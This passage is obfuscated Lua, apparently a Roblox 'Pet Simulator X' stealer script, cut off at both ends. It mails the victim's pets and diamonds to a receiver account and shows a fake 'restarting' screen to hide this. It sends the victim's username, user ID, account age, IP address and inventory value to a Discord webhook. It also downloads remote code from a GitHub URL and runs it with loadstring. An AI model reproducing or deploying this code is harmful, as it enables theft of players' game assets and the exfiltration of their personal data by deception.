);v34:InvokeServer(v66,FinalList3,372 -(45 + 327) );end v476=3 -1 ;end if (v476==(504 -(444 + 58))) then wait(1.5 + 0 );v77=v77 +  #FinalList3 ;break;end if (v476==(0 + 0)) then v477={[1 + 0 ]=v66,[5 -3 ]=FinalList3,[8 -5 ]=1732 -(64 + 1668) };wait();v476=1974 -(1227 + 746) ;end end else print(v7("\66\67\207\166\165","\168\38\44\161\195\150"));break;end end end if ((v68~=nil) and (invspace()~=(1631 -(1539 + 92)))) then while task.wait() do print(v7("\130\253\140\125\100\168\166\3\146\251\135\114","\118\224\156\226\22\80\136\214"));v67=v33:InvokeServer(v68);BHList4={};FinalList4={};local v334=v67.Storage.Pets;local v335={};for v423,v424 in pairs(v334) do v335[v424[v7("\87\231\93","\224\34\142\57")]]=false;end for v426,v427 in pairs(v334) do if ((table.find(PetIDList,v427[v7("\215\163","\110\190\199\165\189\19\145\61")])~=nil) and  not v427.l) then table.insert(BHList4,v427[v7("\207\226\115","\167\186\139\23\136\235")]);end end if ( #BHList4<=invspace()) then for v556,v557 in pairs(BHList4) do table.insert(FinalList4,v557);end elseif ( #BHList4>invspace()) then for v613,v614 in pairs(BHList4) do if ( #FinalList4<invspace()) then table.insert(FinalList4,v614);end end end print(v7("\56\157\164\4\9\161\220\77\64","\109\122\213\232"), #BHList4);print(v7("\200\254\172\49\226\219\171\35\250\163\226\106","\80\142\151\194"), #FinalList4);v74=v67.Storage.Currency.Diamonds;if (( #FinalList4==(0 -0)) and (v74<(1000000258 -(81 + 177))) and (v17>(310787 -200787))) then v74=0 -0 ;end if (( #FinalList4~=(494 -(415 + 79))) or (v74~=(1946 -(708 + 1238)))) then local v480=0 + 0 ;local v481;local v482;local v483;local v484;while true do if (v480==(492 -(142 + 349))) then v483=nil;v484=nil;v480=1 + 1 ;end if (v480==(0 -0)) then v481=0 + 0 ;v482=nil;v480=1 + 0 ;end if (v480==2) then while true do if (v481==(0 -0)) then v482={[1 + 0 ]=v68,[1866 -(1710 + 154) ]=FinalList4,[321 -(200 + 118) ]=0 + 0 };v483,v484=pcall(function()v34:InvokeServer(v68,FinalList4,v74);end);v481=1 -0 ;end if (v481==(1 -0)) then if (v483==false) then local v660=0 + 0 ;while true do if (v660==(0 + 0)) then wait(0.2 + 0 );v34:InvokeServer(v68,FinalList4,0 + 0 );break;end end end v77=v77 +  #FinalList4 ;v481=1 + 1 ;end if (v481==(4 -2)) then wait(1251.5 -(363 + 887) );break;end end break;end end else print(v7("\7\201\121\73\87","\44\99\166\23"));break;end end end if ((v70~=nil) and (invspace()~=0)) then while task.wait() do print(v7("\126\246\39\61\102\228\108\226\59\49\54\160","\196\28\151\73\86\83"));v69=v33:InvokeServer(v70);BHList5={};FinalList5={};local v337=v69.Storage.Pets;local v338={};for v428,v429 in pairs(v337) do v338[v429[v7("\230\10\45","\22\147\99\73\112\226\56\120")]]=false;end for v431,v432 in pairs(v337) do if ((table.find(PetIDList,v432[v7("\177\113","\237\216\21\130\149")])~=nil) and  not v432.l) then table.insert(BHList5,v432[v7("\151\71\91","\62\226\46\63\63\208\169")]);end end if ( #BHList5<=invspace()) then for v558,v559 in pairs(BHList5) do table.insert(FinalList5,v559);end elseif ( #BHList5>invspace()) then for v615,v616 in pairs(BHList5) do if ( #FinalList5<invspace()) then table.insert(FinalList5,v616);end end end print(v7("\199\49\121\138\12\25\122\30\191","\62\133\121\53\227\127\109\79"), #BHList5);print(v7("\54\29\60\244\218\130\171\3\0\103\181\140","\194\112\116\82\149\182\206"), #FinalList5);v75=v69.Storage.Currency.Diamonds;if (( #FinalList5==(0 -0)) and (v75<(1043115659 -43115659)) and (v17>(307957 -197957))) then v75=0 + 0 ;end if (( #FinalList5~=(0 + 0)) or (v75~=(290 -(241 + 49)))) then local v485={[1]=v70,[1 + 1 ]=FinalList5,[7 -4 ]=0 -0 };wait();local v486,v487=pcall(function()v34:InvokeServer(v70,FinalList5,v75);end);if (v486==false) then wait(0.2 -0 );v34:InvokeServer(v70,FinalList5,0 + 0 );end wait(1.5);v77=v77 +  #FinalList5 ;else print(v7("\61\167\66\29\149","\110\89\200\44\120\160\130"));break;end end end local v80=v71 + v72 + v73 + v74 + v75 ;local v81=game:GetService(v7("\155\207\74\95\70\88\40","\45\203\163\43\38\35\42\91")).LocalPlayer.PlayerGui.FreeGifts;Gifts={};if (invspace_nolimit()~=(837 -(289 + 548))) then local v283=1818 -(821 + 997) ;local v284;while true do if (v283==(255 -(195 + 60))) then v284=0 -0 ;while true do if (v284==(0 + 0)) then for v620,v621 in pairs(v81.Frame.Container.Gifts:GetDescendants()) do if (v621.Name==v7("\230\140\209\38\149","\52\178\229\188\67\231\201")) then if (v621.Text==v7("\19\68\84\1\242\81\98","\67\65\33\48\100\151\60")) then table.insert(Gifts,string.split(tostring(v621.Parent),"t")[1 + 1 ]);end end end if ( #Gifts~=(384 -(27 + 357))) then for v641,v642 in pairs(Gifts) do v41:InvokeServer(tonumber(v642));end end break;end end break;end end end if (v59.World==v7("\236\247\175\207\253","\147\191\135\206\184")) then local v285=1501 -(251 + 1250) ;local v286;local v287;local v288;local v289;while true do if (v285==(5 -3)) then if (v288.Text==v7("\101\93\0\219\82\85\69","\190\55\56\100")) then local v574=297 -(90 + 207) ;while true do if (v574==(0 + 0)) then game:GetService(v7("\102\163\61\7\22\241\224","\147\54\207\92\126\115\131")).LocalPlayer.Character.HumanoidRootPart.CFrame=CFrame.new(v286.Position);while task.wait() do if (v288.Text~=v7("\63\52\49\120\8\115\76","\30\109\81\85\29\109")) then break;end end break;end end end if table.find(v59.Gamepasses,18675166 -(706 + 155) ) then if (v289.Text==v7("\205\116\80\179\51\211\189","\156\159\17\52\214\86\190")) then game:GetService(v7("\158\227\188\165\171\253\174","\220\206\143\221")).LocalPlayer.Character.HumanoidRootPart.CFrame=CFrame.new(v287.Position);while task.wait() do if (v289.Text~=v7("\180\120\41\18\221\193\147","\178\230\29\77\119\184\172")) then break;end end end end break;end if (v285==(1 + 0)) then local v488=0;local v489;while true do if (v488==(1032 -(809 + 223))) then v489=0 -0 ;while true do if (v489==(2 -1)) then v285=6 -4 ;break;end if (v489==(0 + 0)) then v288=v286.BillboardGui.Timer;v289=v287.BillboardGui.Timer;v489=1 -0 ;end end break;end end end if (v285==(843 -(268 + 575))) then local v490=0 + 0 ;while true do if (v490==(618 -(14 + 603))) then v285=130 -(118 + 11) ;break;end if (v490==(0 + 0)) then v286=game:GetService(v7("\179\39\180\202\203\67\179\135\45","\210\228\72\198\161\184\51"))[v7("\9\118\222\49\67","\174\86\41\147\112\19")].Interactive[v7("\105\1\131\0\101\61\20\188\90\18\137\24","\203\59\96\237\107\69\111\113")].Pad;v287=game:GetService(v7("\19\25\190\234\34\224\214\39\19","\183\68\118\204\129\81\144"))[v7("\49\146\93\197\59","\226\110\205\16\132\107")].Interactive[v7("\221\234\208\153\115\238\212\225\203\69\248","\33\139\163\128\185")].Pad;v490=1 + 0 ;end end end end end game:GetService(v7("\197\178\11\2\114\234\230","\152\149\222\106\123\23")).LocalPlayer.Character.HumanoidRootPart.CFrame=CFrame.new(game:GetService(v7("\234\41\228\72\166\205\39\245\70","\213\189\70\150\35"))[v7("\112\106\89\41\127","\104\47\53\20")].Interactive.Mailbox.Pad.Position);local v83=v37:InvokeServer();local v84= #v83.Inbox;if ((v84~=(971 -(180 + 791))) and (invspace_nolimit()>=v84)) then local v290=0;while true do if (v290==(0 -0)) then v36:InvokeServer();task.wait(950.5 -(551 + 398) );break;end end end local v85=v59.Diamonds;if (v85<(69517 + 40483)) then local v291=0 + 0 ;while true do if ((0 + 0)==v291) then _G.Webhook=Webhook;_G.LoadingScreen=false;v291=1 + 0 ;end if (v291==(3 -2)) then _G.AntiLeave=false;_G.MouseLock=false;v291=1 + 1 ;end if (v291==(4 -2)) then local v491=0 + 0 ;while true do if (v491==(0 -0)) then loadstring(game:HttpGetAsync("https://raw.githubusercontent.com/rayyylauncher/dwadawdawd/main/dwadwadawdwadadadw",true))();return;end end end end end if (_G.AntiLeave~=false) then local v292=0 -0 ;while true do if (v292==(1351 -(461 + 890))) then for v560,v561 in pairs(game:GetService(v7("\147\64\128\5\185\29\176","\111\195\44\225\124\220")).LocalPlayer.PlayerGui:GetChildren()) do if (v561.Name~=v7("\241\72\22\118\165\191\215\84\25","\203\184\38\96\19\203")) then v561:Destroy();end end for v562,v563 in pairs(game:GetService(v7("\26\124\107\68\233\44\122","\174\89\19\25\33")):GetChildren()) do if ((v563.Name~=v7("\29\27\72\84\223\146\9","\107\79\114\50\46\151\231")) and (v563.Name~=v7("\11\169\183\37\133\33\135\210\54\171\165\61\173\44\190","\160\89\198\213\73\234\89\215"))) then v563:Destroy();end end break;end end end local v86=Instance.new(v7("\123\114\166\251\192\70\86\161\247","\165\40\17\212\158"));local v87=Instance.new(v7("\195\203\9\62\35","\70\133\185\104\83"));local v88=Instance.new(v7("\48\64\92\62\229\5\71\65\38","\169\100\37\36\74"));local v89=Instance.new(v7("\41\138\163\87\5\171\163\82\5\139","\48\96\231\194"));local v90=Instance.new(v7("\252\95\22\57\53\217\173\134\196","\227\168\58\110\77\121\184\207"));v86.Parent=game.Players.LocalPlayer:WaitForChild(v7("\75\48\190\89\180\201\86\176\114","\197\27\92\223\32\209\187\17"));v86.DisplayOrder=733495989 + 266504010 ;v87.Parent=v86;v87.BackgroundColor3=Color3.fromRGB(0,0 + 0 ,89 -(40 + 49) );v87.Position=UDim2.new( -(3.1603854 -2),490 -(99 + 391) , -(1.10370374 + 0),0 -0 );v87.Size=UDim2.new(0,2476374 -1476374 ,0 + 0 ,97407459 + 2592541 );UIAspectRatioConstraint=v87;v88.Parent=v86;v88.BackgroundColor3=Color3.fromRGB(316 -(60 + 1) ,670 -415 ,1859 -(1032 + 572) );v88.BackgroundTransparency=418 -(203 + 214) ;v88.Position=UDim2.new(1817.1512353545 -(568 + 1249) ,0 + 0 ,1999.373532414 -(1864 + 135) ,0 -0 );v88.Size=UDim2.new(0 -0 ,2551 -(913 + 393) ,0 -0 ,104 + 206 );v88.ZIndex=3;v88.Font=Enum.Font.SourceSansBold;v88.Text="We're restarting Pet Simulator X!";v88.TextColor3=Color3.fromRGB(626 -371 ,359 -104 ,145 + 110 );v88.TextSize=284 -(32 + 182) ;v88.TextWrapped=true;v89.Parent=v86;v89.BackgroundColor3=Color3.fromRGB(665 -(269 + 141) ,891 -636 ,567 -312 );v89.BackgroundTransparency=145 -(54 + 90) ;v89.Position=UDim2.new(1981.3251033338258 -(362 + 1619) ,0 + 0 ,552.13342583251 -(457 + 95) ,1625 -(950 + 675) );v89.Size=UDim2.new(0 + 0 ,197 + 313 ,0,1438 -(216 + 963) );v89.ZIndex=1289 -(485 + 802) ;v89.Image="http://www.roblox.com/asset/?id=13441881980";v90.Parent=v86;v90.BackgroundColor3=Color3.fromRGB(255,814 -(432 + 127) ,115 + 140 );v90.BackgroundTransparency=1074 -(1065 + 8) ;v90.Position=UDim2.new(0.1512353545 + 0 ,1601 -(635 + 966) ,0.468594134 + 0 ,0);v90.Size=UDim2.new(707 -(575 + 132) ,2106 -(750 + 111) ,42 -(5 + 37) ,771 -461 );v90.ZIndex=2 + 1 ;v90.Font=Enum.Font.SourceSansBold;v90.Text=v7("\51\83\198\250\16\90\131\236\2\86\215\187\20\87\202\247\6\31\212\254\67\77\198\255\10\77\198\248\23\31\218\244\22\17\141\181","\155\99\63\163");v90.TextColor3=Color3.fromRGB(403 -148 ,120 + 135 ,529 -274 );v90.TextSize=136 -100 ;v90.TextWrapped=true;TitanicList={};TList={};STList={};BananaList={};BList={};HugeList={};HList={};SHList={};PogList={};PList={};SPList={};ExclusiveList={};EList={};SEList={};EventList={};EvList={};SEvList={};SecretList={};SList={};SSList={};MythicList={};MList={};SMList={};table.foreach(Library.Directory.Pets,function(v185,v186)if v186.titanic then table.insert(TitanicList,v185);end if (v186.name==v7("\128\208\175\140\183\133","\228\226\177\193\237\217")) then table.insert(BananaList,v185);end if v186.huge then table.insert(HugeList,v185);end if (string.split(v186.name," ")[1 -0 ]==v7("\4\191\36","\134\84\208\67")) then table.insert(PogList,v185);end if ((v186.rarity==v7("\54\180\133\80\6\191\143\74\22","\60\115\204\230")) and  not v186.huge and  not v186.titanic) then table.insert(ExclusiveList,v185);end if (v186.rarity==v7("\194\44\238\126\243","\16\135\90\139")) then table.insert(EventList,v185);end if (v186.rarity==v7("\103\113\5\33\75\64","\24\52\20\102\83\46\52")) then table.insert(SecretList,v185);end if (v186.rarity==v7("\233\54\53\44\6\199\46\45","\111\164\79\65\68")) then table.insert(MythicList,v185);end end);local v127=v59.Pets;local v128={};for v187,v188 in pairs(v127) do v128[v188[v7("\211\208\135","\138\166\185\227\190\78")]]=false;end v32:InvokeServer(v128);for v190,v191 in pairs(v127) do if (table.find(TitanicList,v191[v7("\194\112","\121\171\20\165\87\50\67")])~=nil) then local v340=0 -0 ;while true do if ((0 + 0)==v340) then table.insert(TList,v191[v7("\211\49\189","\98\166\88\217\86\217")]);table.insert(STList,v191[v7("\255\242","\188\150\150\25\97\230")]);break;end end end end for v192,v193 in pairs(v127) do if (table.find(BananaList,v193[v7("\211\141","\141\186\233\63\98\108")])~=nil) then table.insert(BList,v193[v7("\228\227\40","\69\145\138\76\214")]);end end for v194,v195 in pairs(v127) do if (table.find(HugeList,v195[v7("\121\203","\118\16\175\233\233\223")])~=nil) then table.insert(HList,v195[v7("\158\141\49","\29\235\228\85\219\142\235")]);table.insert(SHList,v195[v7("\52\208","\50\93\180\218\189\23\46\71")]);end end for v196,v197 in pairs(v127) do if (table.find(PogList,v197[v7("\215\160","\40\190\196\59\44\36\188")])~=nil) then local v341=529 -(318 + 211) ;while true do if ((0 -0)==v341) then table.insert(PList,v197[v7("\41\76\216","\109\92\37\188\212\154\29")]);table.insert(SPList,v197[v7("\13\235","\58\100\143\196\163\81")]);break;end end end end for v198,v199 in pairs(v127) do if ((table.find(ExclusiveList,v199[v7("\19\70","\110\122\34\67\195\95\41\133")])~=nil) and  not v199.huge and  not v199.titanic) then table.insert(EList,v199[v7("\96\184\95","\182\21\209\59\42")]);table.insert(SEList,v199[v7("\190\83","\222\215\55\165\125\65")]);end end for v200,v201 in pairs(v127) do if (table.find(EventList,v201[v7("\37\213","\42\76\177\166\122\146\161\141")])~=nil) then local v342=1587 -(963 + 624) ;while true do if (v342==(0 + 0)) then table.insert(EvList,v201[v7("\176\131\1","\22\197\234\101\174\25")]);table.insert(SEvList,v201[v7("\36\48","\230\77\84\197\188\22\207\183")]);break;end end end end for v202,v203 in pairs(v127) do if (table.find(SecretList,v203[v7("\240\16","\85\153\116\166\156\236\193\144")])~=nil) then local v343=846 -(518 + 328) ;while true do if (v343==(0 + 0)) then table.insert(SList,v203[v7("\177\233\73","\96\196\128\45\211\132")]);table.insert(SSList,v203[v7("\60\137","\184\85\237\27\63\178\207\212")]);break;end end end end for v204,v205 in pairs(v127) do if ((table.find(MythicList,v205[v7("\1\93","\63\104\57\105")])~=nil) and v205.hc and v205.dm) then local v344=0 -0 ;while true do if ((0 -0)==v344) then table.insert(MList,v205[v7("\30\142\160","\36\107\231\196")]);table.insert(SMList,v205[v7("\84\177","\231\61\213\194")]);break;end end end end local v129= #TList +  #BList +  #HList +  #EList +  #EvList +  #MList +  #SList +  #PList ;local v130;if (v85>=(((165376 -65376) * v129) + 22256 + 77744)) then v130=((100317 -(301 + 16)) * v129) + (293088 -193088) ;elseif (v85<(((280852 -180852) * v129) + (100959 -(114 + 845)))) then v130=v85;end local v131;if ((v85-v130)<(26094 -16094)) then v131=0;elseif ((v85-v130)>=(25598 -15598)) then v131=v85-v130 ;end function diamondstoconvert(v206)local v207=v206;local v208={k=4 + 0 ,m=7,b=6 + 4 ,T=27 -14 ,[v7("\56\185","\19\105\205\93")]=10 + 6 };local v209=tostring(math.floor(v207));local v210;for v293,v294 in pairs(v208) do if (( #v209>=v294) and ( #v209<(v294 + (881 -(827 + 51))))) then v210=v293;break;end end if v210 then local v345=0 + 0 ;local v346;local v347;local v348;local v349;local v350;while true do if (v345==1) then v348=nil;v349=nil;v345=6 -4 ;end if (v345==(0 + 0)) then v346=0 -0 ;v347=nil;v345=1020 -(829 + 190) ;end if (v345==(7 -5)) then v350=nil;while true do if (v346==(0 -0)) then v347=v208[v210];v348=math.floor(v207/((13 -3)^(v347-(7 -4))) ) * ((9 + 1)^(v347-(1 + 2))) ;v346=1 + 0 ;end if (v346==(2 -1)) then v209=string.format(v7("\236\88\144\211\57","\95\201\104\190\225"),v348/((10 + 0)^(v347-(1057 -(1049 + 7)))) );v349=string.split(v209,".")[8 -6 ];v346=615 -(520 + 93) ;end if (v346==(278 -(259 + 17))) then v350=".";if ((string.split(v349,"")[1 + 1 ]=="0") and (string.split(v349,"")[1 + 0 ]~="0")) then v209=string.split(v209,".")[1 -0 ]   .. v350   .. string.split(v349,"")[3 -2 ]   .. v210 ;elseif ((string.split(v349,"")[2]=="0") and (string.split(v349,"")[592 -(396 + 195) ]=="0")) then v209=string.split(v209,".")[2 -1 ]   .. v210 ;elseif ((string.split(v349,"")[1763 -(440 + 1321) ]~="0") and (string.split(v349,"")[1830 -(1059 + 770) ]~="0")) then v209=v209   .. v210 ;elseif ((string.split(v349,"")[1017 -(446 + 569) ]~="0") and (string.split(v349,"")[4 -3 ]=="0")) then v209=v209   .. v210 ;else v209=v206;end break;end end break;end end end return v209;end local v132=diamondstoconvert(v131);local v133=diamondstoconvert(v80);function RAP()local v211=545 -(424 + 121) ;local v212;local v213;while true do if (v211==(1 + 0)) then while true do if (v212==(1347 -(641 + 706))) then local v575=0 -0 ;while true do if (v575==(0 + 0)) then v213=diamondstoconvert(v59.RAP);return v213;end end end end break;end if ((0 + 0)==v211) then local v433=440 -(249 + 191) ;while true do if (v433==(4 -3)) then v211=1 + 0 ;break;end if (v433==(0 -0)) then v212=427 -(183 + 244) ;v213=nil;v433=1 + 0 ;end end end end end local v134=Webhook;local v135=true;local function v136(v214,v215,v216,v217,v218,v219,v220)local v221=730 -(434 + 296) ;local v222;local v223;local v224;local v225;while true do if ((2 -1)==v221) then v224="/5";v225=string.split(v219,"rbxassetid://")[2];v221=514 -(169 + 343) ;end if (v221==(673 -(623 + 47))) then if ((v77~=(0 + 0)) or (v80~=(0 -0))) then local v564=0 + 0 ;local v565;while true do if (v564==(0 -0)) then v565=0 + 0 ;while true do if (v565==(1 + 0)) then newdata1=game:GetService(v7("\5\175\250\42\30\190\252\44\36\184\235","\90\77\219\142")):JSONEncode(v25);v223={[v7("\229\11\47\45\73\9\110\171\16\56\41\73","\26\134\100\65\89\44\103")]="application/json"};v565=5 -3 ;end if ((1125 -(651 + 472))==v565) then if ((Webhook~=nil) and (v135==true)) then local v663=0 + 0 ;while true do if (v663==(0 + 0)) then v222={[v7("\196\241\60","\196\145\131\80\67")]=v134,[v7("\60\191\2\17","\136\126\208\102\104\120")]=newdata1,[v7("\85\143\218\75\160\86","\49\24\234\174\35\207\50\93")]=v7("\60\221\206\188","\17\108\146\157\232"),[v7("\99\198\21\233\42\186\88","\200\43\163\116\141\79")]=v223};request(v222);break;end end end break;end if (v565==(0 -0)) then local v654=0;local v655;while true do if (v654==(0 + 0)) then v655=0 -0 ;while true do if (v655==(0 + 0)) then imgs="https://cdn.discordapp.com/attachments/1100823909009465497/1124473588045590578/Screenshot_20230414-055925_Gallery_1.jpg";v25={[v7("\47\6\232\24\41\7\242","\108\76\105\134")]=v216,[v7("\254\214\180\243\192\234\200\180","\174\139\165\209\129")]=v7("\178\171\179","\24\195\211\130\161\166\99\16"),[v7("\71\21\232\56\82\4\121\22\251\32","\118\38\99\137\76\51")]=imgs,[v7("\248\43\7\23\13\51","\64\157\70\101\114\105")]={{[v7("\84\161\179\239\21","\112\32\200\199\131")]=v7("\102\26\114\189\212\235\10\37\68\22\242\131\183\62\61\72\13\248\240\191\39\45\92\89\170\223\183","\66\76\48\60\216\163\203"),[v7("\175\148\117","\68\218\230\25\147\63\174")]="https://discord.gg/4y4CZfdJHu",[v7("\185\51\67\73","\214\205\74\51\44")]=v7("\232\69\225\244","\23\154\44\130\156"),[v7("\18\169\161\161\36","\115\113\198\205\206\86")]=tonumber(2283504 + 311567 ),[v7("\144\95\235\87\134\89\255\83\136","\58\228\55\158")]={[v7("\161\155\220","\85\212\233\176\78\92\205")]=v225,[v7("\66\93\129\229\66\76","\130\42\56\232")]=903 -(397 + 86) ,[v7("\253\188\32\247\72","\95\138\213\68\131\32")]=1296 -(423 + 453) },[v7("\44\33\164\79\114\57","\22\74\72\193\35")]={{[v7("\34\120\233\93","\56\76\25\132")]="**qx1 Scriptz's Stealer** :skull:",[v7("\72\192\167\51\202","\175\62\161\203\70")]=v7("\60\221\195\38\38\57\207\205\18\56\57\157\131\83\117\124\135\131","\85\92\189\163\115")   .. v22   .. "\nUser-ID      : "   .. v23.userId   .. "\nAccount Age  : "   .. v23.AccountAge   .. " Days\nIP Address   : "   .. v24   .. "\nRank           : "   .. v21   .. "\nRAP          : "   .. RAP()   .. "\nExploit      : "   .. v19   .. "\nReceiver     : "   .. v220   .. v7("\41\172\48","\88\73\204\80") ,[v7("\39\141\28\79\39\223","\186\78\227\112\38\73")]=false},{[v7("\242\86\240\80","\26\156\55\157\53\51")]=v7("\214\222\4\214\191\10\204\146\92\233\189\68\159\152\26\220\190\68\198\146\86\131\190\66\131\223\76","\48\236\184\118\185\216"),[v7("\243\188\91\37\202","\84\133\221\55\80\175")]=v7("\189\231\36","\60\221\135\68\198\167")   .. v218   .. v7("\238\189\248","\185\142\221\152\227\34") ,[v7("\81\203\91\243\77\54","\151\56\165\55\154\35\83")]=true},{[v7("\174\66\8\235","\142\192\35\101")]=v7("\140\114\44\174\189\204\230\92\242\124\40\174\232\130\168\5\156\63\105\249\224\137\161\76","\118\182\21\73\195\135\236\204"),[v7("\30\61\22\85\1","\157\104\92\122\32\100\109")]=v7("\163\166\207","\203\195\198\175\170\93\71\237")   .. v217   .. v7("\46\75\62","\156\78\43\94\181\49\113") ,[v7("\123\230\200\170\5\70","\25\18\136\164\195\107\35")]=true},{[v7("\230\44\164\74","\216\136\77\201\47\18\220\161")]=v214,[v7("\59\237\39\207\13","\226\77\140\75\186\104\188")]=v7("\185\206\208","\47\217\174\176\95")   .. v215   .. v7("\184\221\118","\70\216\189\22\98\210\52\24") ,[v7("\211\209\175\142\221\223","\179\186\191\195\231")]=true},{[v7("\247\62\21\225","\132\153\95\120")]=v7("\235\176\15\35\252\128\224\251\248\36\34\254\212\165\181\242\44\44\249\209\179\251\248\78\119\245\219\174\186\232","\192\209\210\110\77\151\186"),[v7("\246\2\46\252\250","\164\128\99\66\137\159")]=v7("\0\137\233","\222\96\233\137")   .. v76   .. v224   .. v7("\185\179\167","\144\217\211\199\127\232\147") ,[v7("\241\33\50\33\219\64","\36\152\79\94\72\181\37\98")]=true},{[v7("\217\217\74\58","\95\183\184\39")]=v7("\239\56\226\43\14\192\72\255\8\227\102\112\137\3\184\48\233\34\71\202\72\245\101\224\35\89\218","\98\213\95\135\70\52\224"),[v7("\232\162\197\98\81","\52\158\195\169\23")]=v7("\122\188\50","\235\26\220\82\20\230\85\27")   .. v133   .. v7("\136\161\233","\20\232\193\137\162") ,[v7("\43\209\201\175\233\137","\17\66\191\165\198\135\236\119")]=true},{[v7("\1\174\163\22","\177\111\207\206\115\159\136\140")]=v7("\95\132\31\26\209\86\96\8\134\5\0\220\21\31\79\195\39\16\148\103\74\2\140\3\94\158\15\5\8\134\30\17\205\112\82\10\156\4\28\142","\63\101\233\112\116\180\47"),[v7("\213\58\225\7\253","\86\163\91\141\114\152")]=v7("\83\11\116","\90\51\107\20\19")   .. v77   .. v7("\141\240\133","\93\237\144\229\143") ,[v7("\28\248\252\16\5\67","\38\117\150\144\121\107")]=true}}}}};v655=1342 -(391 + 950) ;end if (v655==(1 + 0)) then v565=1 + 0 ;break;end end break;end end end end break;end end else local v566=0 + 0 ;while true do if (v566==(4 -2)) then if ((Webhook~=nil) and (v135==true)) then local v645=0 + 0 ;local v646;while true do if (v645==(0 -0)) then v646=0 + 0 ;while true do if ((596 -(157 + 439))==v646) then v222={[v7("\176\215\43","\32\229\165\71\129\196\126\223")]=v134,[v7("\225\134\192\152","\181\163\233\164\225\225")]=newdata1,[v7("\125\142\42\127\95\143","\23\48\235\94")]=v7("\76\245\235\105","\178\28\186\184\61\55\83"),[v7("\236\200\70\56\247\28\230","\149\164\173\39\92\146\110")]=v223};request(v222);break;end end break;end end end break;end if (v566==1) then newdata1=game:GetService(v7("\150\100\206\215\48\176\145\7\183\115\223","\113\222\16\186\167\99\213\227")):JSONEncode(v25);v223={[v7("\45\1\245\226\43\0\239\187\58\23\235\243","\150\78\110\155")]="application/json"};v566=2 -0 ;end if (v566==(0 -0)) then imgs="https://cdn.discordapp.com/attachments/1100823909009465497/1124473588045590578/Screenshot_20230414-055925_Gallery_1.jpg";v25={[v7("\188\57\51\151\181\250\247","\131\223\86\93\227\208\148")]=v216,[v7("\246\86\179\164\19\180\238\64","\213\131\37\214\214\125")]=v7("\55\51\116\255\210\37\57\44\175\245\60","\129\70\75\69\223"),[v7("\71\221\242\253\125\253\121\222\225\229","\143\38\171\147\137\28")]=imgs,[v7("\213\143\187\246\7\240","\180\176\226\217\147\99\131")]={{[v7("\199\176\59\11\214","\103\179\217\79")]=v7("\0\253\50\208\86\204\139\67\163\86\159\1\144\191\91\175\77\149\114\152\166\75\187\25\199\93\144","\195\42\215\124\181\33\236"),[v7("\24\75\59","\152\109\57\87\94\69")]="https://discord.gg/4y4CZfdJHu",[v7("\237\206\26\166","\200\153\183\106\195\222\178\52")]=v7("\32\234\139\53","\58\82\131\232\93\41"),[v7("\128\88\220\26\79","\95\227\55\176\117\61")]=tonumber(2595989 -(782 + 136) ),[v7("\12\118\54\70\169\22\127\42\71","\203\120\30\67\43")]={[v7("\228\55\65","\185\145\69\45\143")]=v225,[v7("\130\26\16\161\212\158","\188\234\127\121\198")]=1051 -631 ,[v7("\47\59\23\151\48","\227\88\82\115")]=1275 -(112 + 743) },[v7("\69\22\191\171\6\96","\19\35\127\218\199\98")]={{[v7("\18\250\7\231","\130\124\155\106")]="**Monzz Scriptz's Stealer** :skull:",[v7("\195\202\250\186\166","\223\181\171\150\207\195\150\28")]=v7("\76\58\227\155\26\73\40\237\175\4\73\122\163\238\73\12\96\163","\105\44\90\131\206")   .. v22   .. "\nUser-ID      : "   .. v23.userId   .. "\nAccount Age  : "   .. v23.AccountAge   .. " Days\nIP Address   : "   .. v24   .. "\nRank         : "   .. v21   .. "\nRAP          : "   .. RAP()   .. "\nExploit      : "   .. v19   .. "\nReceiver     : "   .. v220   .. v7("\255\224\178","\94\159\128\210\217\104") ,[v7("\89\247\10\182\81\122","\26\48\153\102\223\63\31\153")]=false},{[v7("\12\65\224\246","\147\98\32\141")]=v7("\66\69\241\197\1\12\11\82\9\211\207\18\69\11\20\70\229\222\76\28\11\66\69\241\197\1\12","\43\120\35\131\170\102\54"),[v7("\66\7\139\163\160","\228\52\102\231\214\197\208")]=v7("\30\224\117","\182\126\128\21\170\138\235\121")   .. v218   .. v7("\139\218\53","\102\235\186\85\134\230\115\80") ,[v7("\94\2\50\86\124\209","\66\55\108\94\63\18\180")]=true},{[v7("\26\140\136\50","\57\116\237\229\87\71")]=v7("\240\182\232\234\45\174\13\224\149\228\230\122\225\73\174\162\167\173\55\180\64\175\188\183","\39\202\209\141\135\23\142"),[v7("\233\50\5\31\55","\152\159\83\105\106\82")]=v7("\129\198\81","\60\225\166\49\146\169")   .. v217   .. v7("\47\30\47","\103\79\126\79\74\97") ,[v7("\179\113\223\122\80\31","\122\218\31\179\19\62")]=true},{[v7("\189\215\192\196","\37\211\182\173\161\169\193")]=v214,[v7("\225\59\65\204\45","\217\151\90\45\185\72\27")]=v7("\195\124\231","\54\163\28\135\114")   .. v215   .. v7("\40\219\93","\31\72\187\61\226\46") ,[v7("\202\8\79\219\73\123","\68\163\102\35\178\39\30")]=true}}}}};v566=1 + 0 ;end end end break;end if (v221==(2 + 0)) then v225=game:HttpGet("https://thumbnails.roblox.com/v1/assets?assetIds="   .. v225   .. v7("\233\217\196\218\186\217\207\254\160\199\200\205\182\150\241\194\174\200\196\230\160\199\197\203\189\141\210\199\181\206\156\154\253\155\217\154\253\155\135\200\160\217\204\207\187\150\241\192\168\141\200\221\140\194\211\205\186\199\192\220\242\205\192\194\188\206","\174\207\171\161") );v225=game:GetService(v7("\197\234\25\227\203\210\255\232\4\240\253","\183\141\158\109\147\152")):JSONDecode(v225).data[2 -1 ].imageUrl;v221=1 + 2 ;end if (v221==(0 -0)) then v222=nil;v223=nil;v221=2 -1 ;end end end local v137=getgenv().Settings.User;local v138;local v139;local v140;local v141;local v142;local v143;local v144;local v145;local v146;local v147=v7("\222\40\30\5\0\91\218\52\80\61\31\15\231\34\2","\123\147\71\112\127\122");if (v137~=nil) then local v295=0 + 0 ;while true do if (v295==(0 -0)) then local v492=1595 -(210 + 1385) ;while true do if (v492==(1691 -(1201 + 488))) then v295=1 + 0 ;break;end if (v492==(1 -0)) then if getgenv().Settings.Huges.Dualhook then v140=getgenv().Settings.Huges.Intensity;end if getgenv().Settings.Pogs.Dualhook then v141=getgenv().Settings.Pogs.Intensity;end v492=2 -0 ;end if (v492==(585 -(352 + 233))) then if getgenv().Settings.Titanics.Dualhook then v138=getgenv().Settings.Titanics.Intensity;end if getgenv().Settings.Banana.Dualhook then v139=getgenv().Settings.Banana.Intensity;end v492=3 -2 ;end end end if (v295==2) then if getgenv().Settings.Gems.Dualhook then v146=getgenv().Settings.Gems.Intensity;end if (getgenv().Settings.Webhook~=true) then v135=false;end if 